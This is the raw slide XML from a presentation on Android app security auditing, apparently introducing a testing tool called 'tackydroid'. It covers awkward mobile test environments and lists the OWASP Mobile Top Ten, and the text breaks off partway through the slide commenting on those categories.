      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="4600200" cx="7153199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What is this number?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="20000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>90%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en-US">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sure that random stats make presentations better</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>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Crazy setups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 260"/>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Simply put, a mobile application development environment can be very unique in terms of access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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MDM setup can be a pain</a:t>
            </a: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But what if the STG environment is in another network</a:t>
            </a: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Also what about outsourced projects?? (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>these are the worst</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>).</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>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Crazy setups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Shape 266"/>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Stuck in front of our desk</a:t>
            </a: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Mobile projects are not really mobile</a:t>
            </a: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lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1822275" x="2359825"/>
            <a:ext cy="3473625" cx="44981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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>AGENDA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>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274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2050" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Spot the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What the f@#k is tackydroid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Why we made it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tackydroid features/internal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2050" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2050" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Future work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="410"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="97619"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2050" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Questions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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Shape 272"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>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When auditing Android apps, it could basically be split into two parts</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Client side code</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Server side code (Web APIs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Fun part normally stays in the web or web api used by the app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1"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Most apps just calls existing web APIs anyway</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="4564499" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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Owasp mobile top ten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M1: Weak server side control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M2: Insecure data storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M3: Insufficient transport layer protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M4: Unintended data leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M5: Poor authorization and authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M6: Broken Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M7: Client side injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M8: Security decision via untrusted inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M9: Improper session handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M10: Lack of binary protections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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>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0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M1: Weak server side control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>More related to server side configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>But you access it via web API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M5: Poor authorization and authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
